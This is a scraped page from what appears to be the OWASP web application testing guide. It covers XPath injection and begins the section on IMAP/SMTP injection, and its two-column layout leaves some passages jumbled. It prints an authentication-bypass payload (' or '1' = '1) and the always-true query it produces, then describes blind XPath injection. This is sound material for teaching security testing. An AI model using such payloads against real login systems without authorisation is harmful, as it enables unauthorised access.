4.0
1NSchAb
1NSchAb
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
139<br />
Web Application Penetration Testing<br />
string( /user[username/text()=’gandalf’ and password/text()=’!c3’]/account/text())<br />
If the application does not properly filter user input, the tester will<br />
be able to inject XPath code and interfere with the query result.<br />
For instance, the tester could input the following values:<br />
Username: ‘ or ‘1’ = ‘1<br />
Password: ‘ or ‘1’ = ‘1<br />
front-end web servers.Therefore, mail server results may be more<br />
vulnerable to attacks by end users (see the scheme presented in<br />
Figure 1).<br />
WEBMAIL USER<br />
1<br />
Looks quite familiar, doesn’t it? Using these parameters, the query<br />
becomes:<br />
string( /user[username/text()=’’ or ‘1’ = ‘1’ and password/<br />
text()=’’ or ‘1’ = ‘1’]/account/text())<br />
INTERNET<br />
As in a common SQL Injection attack, we have created a query<br />
that always evaluates to true, which means that the application<br />
will authenticate the user even if a username or a password have<br />
not been provided. And as in a common SQL Injection attack, with<br />
XPath injection, the first step is to insert a single quote (‘) in the<br />
field to be tested, introducing a syntax error in the query, and to<br />
check whether the application returns an error message.<br />
If there is no knowledge about the XML data internal details and if the<br />
application does not provide useful error messages that help us reconstruct<br />
its internal logic, it is possible to perform a Blind XPath Injection<br />
attack, whose goal is to reconstruct the whole data structure.<br />
The technique is similar to inference based SQL Injection, as the<br />
approach is to inject code that creates a query that returns one bit<br />
of information. Blind XPath Injection is explained in more detail by<br />
Amit Klein in the referenced paper.<br />
References<br />
Whitepapers<br />
• Amit Klein: “Blind XPath Injection” -<br />
http://www.modsecurity.org/archive/amit/blind-xpathinjection.pdf<br />
• XPath 1.0 specifications - http: /www.w3.org/TR/xpath<br />
Testing for IMAP/SMTP Injection<br />
(OTG-INPVAL-011)<br />
Summary<br />
This threat affects all applications that communicate with mail<br />
servers (IMAP/SMTP), generally webmail applications. The aim of<br />
this test is to verify the capacity to inject arbitrary IMAP/SMTP<br />
commands into the mail servers, due to input data not being properly<br />
sanitized.<br />
The IMAP/SMTP Injection technique is more effective if the mail<br />
server is not directly accessible from Internet. Where full communication<br />
with the backend mail server is possible, it is recommended<br />
to conduct direct testing.<br />
An IMAP/SMTP Injection makes it possible to access a mail server<br />
which otherwise would not be directly accessible from the Internet.<br />
In some cases, these internal systems do not have the same<br />
level of infrastructure security and hardening that is applied to the<br />
PUBLIC ZONE<br />
2<br />
WEBMAIL APPLICATION<br />
2 3<br />
PRIVATE ZONE (HIDDEN SERVERS)<br />
MAIL SERVERS<br />
Figure 1 depicts the flow of traffic generally seen when using<br />
webmail technologies. Step 1 and 2 is the user interacting with<br />
the webmail client, whereas step 2 is the tester bypassing the<br />
webmail client and interacting with the back-end mail servers<br />
directly.<br />
This technique allows a wide variety of actions and attacks. The<br />
possibilities depend on the type and scope of injection and the<br />
mail server technology being tested.<br />
Some examples of attacks using the IMAP/SMTP Injection technique<br />
are: